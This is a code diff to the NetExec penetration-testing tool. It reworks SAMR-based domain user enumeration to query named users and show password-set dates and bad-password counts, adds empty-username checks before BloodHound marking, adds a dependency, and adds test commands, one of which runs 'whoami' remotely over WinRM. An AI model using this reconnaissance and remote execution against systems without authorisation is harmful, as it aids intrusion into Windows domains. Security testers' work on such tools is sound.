vgroup.add_argument("--users", nargs="*", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers")
vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid")

View File

@ -189,7 +189,7 @@ class mssql(connection):
raise
self.check_if_admin()
self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -222,7 +222,7 @@ class mssql(connection):
self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -261,7 +261,7 @@ class mssql(connection):
self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)

View File

@ -243,7 +243,7 @@ class rdp(connection):
self.mark_pwned(),
)
)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -289,7 +289,7 @@ class rdp(connection):
self.admin_privs = True
self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -323,7 +323,7 @@ class rdp(connection):
self.admin_privs = True
self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)

View File

@ -317,7 +317,7 @@ class smb(connection):
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth and not self.args.delegate:
if not self.args.local_auth and self.username != "" and not self.args.delegate:
add_user_bh(self.username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -380,7 +380,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}")
@ -447,7 +447,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id)
@ -1008,8 +1008,10 @@ class smb(connection):
return groups
def users(self):
self.logger.display("Trying to dump local users with SAMRPC protocol")
return UserSamrDump(self).dump()
if len(self.args.users) > 0:
self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
return UserSamrDump(self).dump(self.args.users)
def hosts(self):
hosts = []

View File

@ -38,7 +38,7 @@ def proto_args(parser, std_parser, module_parser):
egroup.add_argument("--disks", action="store_true", help="enumerate disks")
egroup.add_argument("--loggedon-users-filter", action="store", help="only search for specific user, works with regex")
egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users")
egroup.add_argument("--users", nargs="?", const="", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--users", nargs="*", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP", help="enumerate domain groups, if a group is specified than its members are enumerated")
egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users")
egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated")

View File

@ -4,6 +4,7 @@ from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.nt_errors import STATUS_MORE_ENTRIES
from datetime import datetime, timedelta
class UserSamrDump:
@ -26,6 +27,8 @@ class UserSamrDump:
self.doKerberos = connection.kerberos
self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()
self.users = []
self.rpc_transport = None
self.dce = None
if self.hash is not None:
if self.hash.find(":") != -1:
@ -36,46 +39,37 @@ class UserSamrDump:
if self.password is None:
self.password = ""
def dump(self):
def dump(self, requested_users=None):
# Try all requested protocols until one works.
for protocol in self.protocols:
try:
protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
except KeyError:
self.logger.debug(f"Invalid Protocol '{protocol}'")
self.logger.debug(f"Invalid Protocol: {protocol}")
self.logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport(
self.addr,
port,
r"\samr",
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
self.aesKey,
doKerberos=self.doKerberos,
)
self.rpc_transport = transport.SMBTransport(self.addr, port, r"\samr", self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, doKerberos=self.doKerberos)
try:
self.fetchList(rpctransport)
self.fetch_users(requested_users)
break
except Exception as e:
self.logger.debug(f"Protocol failed: {e}")
self.logger.debug(f"Connection with protocol {protocol} failed: {e}")
return self.users
def fetchList(self, rpctransport):
dce = DCERPC_v5(rpctransport)
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
def fetch_users(self, requested_users):
self.dce = DCERPC_v5(self.rpc_transport)
self.dce.connect()
self.dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection
resp = samr.hSamrConnect2(dce)
resp = samr.hSamrConnect2(self.dce)
if resp["ErrorCode"] != 0:
raise Exception("Connect error")
resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
enumerationContext=0,
preferedMaximumLength=500,
@ -84,7 +78,7 @@ class UserSamrDump:
raise Exception("Connect error")
resp3 = samr.hSamrLookupDomainInSamServer(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
name=resp2["Buffer"]["Buffer"][0]["Name"],
)
@ -92,7 +86,7 @@ class UserSamrDump:
raise Exception("Connect error")
resp4 = samr.hSamrOpenDomain(
dce,
self.dce,
serverHandle=resp["ServerHandle"],
desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3["DomainId"],
@ -101,28 +95,84 @@ class UserSamrDump:
raise Exception("Connect error")
self.__domains = resp2["Buffer"]["Buffer"]
domainHandle = resp4["DomainHandle"]
domain_handle = resp4["DomainHandle"]
# End Setup
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
if requested_users:
self.logger.debug(f"Looping through users requested and looking up their information: {requested_users}")
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)
names_lookup_resp = samr.hSamrLookupNamesInDomain(self.dce, domain_handle, requested_users)
rids = [r["Data"] for r in names_lookup_resp["RelativeIds"]["Element"]]
self.logger.debug(f"Specific RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
resp = e.get_packet()
self.logger.success("Enumerated domain user(s)")
for user in resp["Buffer"]["Buffer"]:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
info_user = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation)["Buffer"]["All"]["AdminComment"]
self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user}")
self.users.append(user["Name"])
samr.hSamrCloseHandle(dce, r["UserHandle"])
self.logger.debug(f"Exception while requesting users in domain: {e}")
if "STATUS_SOME_NOT_MAPPED" in str(e):
# which user is not translated correctly isn't returned so we can't tell the user which is failing, which is very annoying
self.logger.fail("One of the users requested does not exist in the domain, causing a critical failure during translation, re-check the users and try again")
else:
self.logger.fail(f"Error occurred when looking up users in domain: {e}")
else:
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
enumerate_users_resp = samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
enumerate_users_resp = e.get_packet()
enumerationContext = resp["EnumerationContext"]
status = resp["ErrorCode"]
rids = [r["RelativeId"] for r in enumerate_users_resp["Buffer"]["Buffer"]]
self.logger.debug(f"Full domain RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
dce.disconnect()
# set these for the while loop
enumerationContext = enumerate_users_resp["EnumerationContext"]
status = enumerate_users_resp["ErrorCode"]
self.print_user_info(users)
self.dce.disconnect()
def get_user_info(self, domain_handle, user_ids):
    """Query SAMR for per-user details for each RID in *user_ids*.

    :param domain_handle: open SAMR domain handle (from hSamrOpenDomain)
    :param user_ids: iterable of RIDs to look up
    :return: list of dicts with keys ``name``, ``description``,
             ``bad_pwd_count`` and ``last_pw_set``
    """
    self.logger.debug(f"Getting user info for users: {user_ids}")
    users = []

    for user in user_ids:
        self.logger.debug(f"Calling hSamrOpenUser for RID {user}")
        open_user_resp = samr.hSamrOpenUser(
            self.dce,
            domain_handle,
            samr.MAXIMUM_ALLOWED,
            user
        )
        try:
            info_user_resp = samr.hSamrQueryInformationUser2(
                self.dce,
                open_user_resp["UserHandle"],
                samr.USER_INFORMATION_CLASS.UserAllInformation
            )["Buffer"]

            user_info = info_user_resp["All"]
            user_name = user_info["UserName"]
            bad_pwd_count = user_info["BadPasswordCount"]
            user_description = user_info["AdminComment"]
            last_pw_set = old_large_int_to_datetime(user_info["PasswordLastSet"])
            if last_pw_set == "1601-01-01 00:00:00":
                # FILETIME 0 means the password was never set
                last_pw_set = "<never>"
            users.append({"name": user_name, "description": user_description, "bad_pwd_count": bad_pwd_count, "last_pw_set": last_pw_set})
        finally:
            # Always release the per-user handle, even when the info query
            # raises, so a mid-loop DCERPC error does not leak server-side
            # SAMR handles for the remaining users
            samr.hSamrCloseHandle(self.dce, open_user_resp["UserHandle"])
    return users
def print_user_info(self, users):
    """Render the collected user records as an aligned highlight table."""
    header = f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}"
    self.logger.highlight(header)
    for entry in users:
        self.logger.debug(f"Full user info: {entry}")
        row = f"{entry['name']:<30}{entry['last_pw_set']:<20}{entry['bad_pwd_count']:<8}{entry['description']} "
        self.logger.highlight(row)
def old_large_int_to_datetime(large_int):
    """Convert a SAMR OLD_LARGE_INTEGER (Windows FILETIME) into a
    ``YYYY-MM-DD HH:MM:SS`` string.

    FILETIME counts 100-nanosecond intervals elapsed since 1601-01-01.
    """
    filetime = (large_int["HighPart"] << 32) | large_int["LowPart"]
    seconds_since_1601 = filetime / 10**7
    when = datetime(1601, 1, 1) + timedelta(seconds=seconds_since_1601)
    return when.replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")

View File

@ -167,7 +167,7 @@ class winrm(connection):
self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except Exception as e:
@ -210,7 +210,7 @@ class winrm(connection):
self.db.add_admin_user("hash", domain, self.username, nthash, self.host)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
return True

16
poetry.lock generated
View File

@ -1826,6 +1826,20 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras]
testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
[[package]]
name = "python-dateutil"
version = "2.9.0.post0"
description = "Extensions to the standard Python datetime module"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
files = [
{file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
{file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
]
[package.dependencies]
six = ">=1.5"
[[package]]
name = "python-libnmap"
version = "0.7.3"
@ -2293,4 +2307,4 @@ testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "p
[metadata]
lock-version = "2.0"
python-versions = "^3.8.0"
content-hash = "19dfeaa2fa332997fb149a591b147061c8da77e2f69b8734d7f988562231a4e7"
content-hash = "0bbd6a14b3478776b71e58b674942a5053c24fd2f802cc45ccd968f205a80167"

View File

@ -63,6 +63,7 @@ rich = "^13.3.5"
python-libnmap = "^0.7.3"
oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" } # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23)
argcomplete = "^3.1.4"
python-dateutil = ">=2.8.2"
[tool.poetry.group.dev.dependencies]
flake8 = "*"

View File

@ -183,6 +183,8 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-de
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso --options
##### WINRM
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X whoami